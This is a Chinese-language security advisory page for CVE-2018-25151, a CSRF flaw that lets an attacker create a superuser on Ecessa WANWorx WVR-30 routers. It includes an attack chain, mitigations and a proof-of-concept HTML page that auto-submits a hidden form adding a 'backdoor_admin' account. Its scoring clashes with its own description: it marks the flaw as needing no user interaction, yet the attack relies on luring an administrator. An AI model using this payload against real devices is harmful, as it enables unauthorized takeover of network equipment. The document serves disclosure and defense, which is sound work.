CVE-2018-25151 CVSS 4.3 中危

CVE-2018-25151 Ecessa WANWorx WVR-30 CSRF漏洞可创建超级用户

披露日期: 2025-12-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25151

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ecessa WANWorx WVR-30

漏洞概述

CVE-2018-25151是Ecessa WANWorx WVR-30设备中的一个中危跨站请求伪造(CSRF)漏洞。该漏洞存在于10.7.4之前的版本，由于应用程序缺少对敏感操作的CSRF令牌验证，攻击者可以诱导已认证的管理员用户访问恶意网页，从而在不知情的情况下执行管理操作。攻击者利用此漏洞可以创建新的超级用户账户，获得设备的完全控制权。此漏洞的CVSS评分为4.3，属于中等严重程度，攻击向量为网络，攻击复杂度低，需要低权限但无需用户交互。漏洞由VulnCheck发现并披露。

技术细节

Ecessa WANWorx WVR-30是一款企业级广域网路由器设备，其Web管理界面存在CSRF漏洞。漏洞的根本原因在于管理功能缺少CSRF token验证机制。攻击者可以构造一个包含隐藏HTML表单的恶意网页，当已认证的管理员访问该页面时，浏览器会自动向目标设备发送POST请求。由于浏览器会自动携带目标域的Cookie，设备会认为这是合法的管理员操作。攻击者通常在表单中预设创建超级用户的参数，包括用户名、密码和权限级别。由于所有参数都在请求体中传递，攻击者可以完全控制新账户的凭证。成功利用后，攻击者获得设备的持久访问权限，可进一步进行内网渗透或数据窃取。

攻击链分析

STEP 1

步骤1

攻击者收集目标Ecessa WANWorx WVR-30设备信息，确定管理界面地址和版本号

STEP 2

步骤2

攻击者构造恶意HTML页面，包含隐藏表单，表单目标指向设备管理接口

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意链接或社会工程学手段诱导已认证管理员访问恶意页面

STEP 4

步骤4

管理员浏览器自动发送POST请求到目标设备，携带有效会话Cookie

STEP 5

步骤5

设备收到请求后验证Cookie有效，执行创建超级用户的操作

STEP 6

步骤6

攻击者使用创建的超级用户账户登录设备，获得完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2018-25151 CSRF PoC for creating superuser on Ecessa WANWorx WVR-30 -->
<!-- This PoC creates a new superuser account with admin privileges -->

<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <form action="http://<target_ip>/cgi-bin/manage.cgi" method="POST" id="csrf-form">
        <!-- Hidden fields for user creation -->
        <input type="hidden" name="action" value="add_user">
        <input type="hidden" name="user_type" value="superuser">
        <input type="hidden" name="username" value="backdoor_admin">
        <input type="hidden" name="password" value="P@ssw0rd123!">
        <input type="hidden" name="confirm_password" value="P@ssw0rd123!">
        <input type="hidden" name="privileges" value="full">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>

影响范围

Ecessa WANWorx WVR-30 < 10.7.4

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用浏览器扩展阻止第三方Cookie；2) 启用浏览器的CSRF保护功能；3) 管理员在执行敏感操作时使用专用浏览器配置文件；4) 监控设备日志关注异常的账户创建行为；5) 限制管理界面的访问来源IP，仅允许内网访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2018-25151
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2018-25151
3 Details https://www.cvedetails.com/cve/CVE-2018-25151/
4 VulDB https://vuldb.com/cve/CVE-2018-25151
5 Link https://www.ecessa.com
6 Link https://www.exploit-db.com/exploits/44936

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表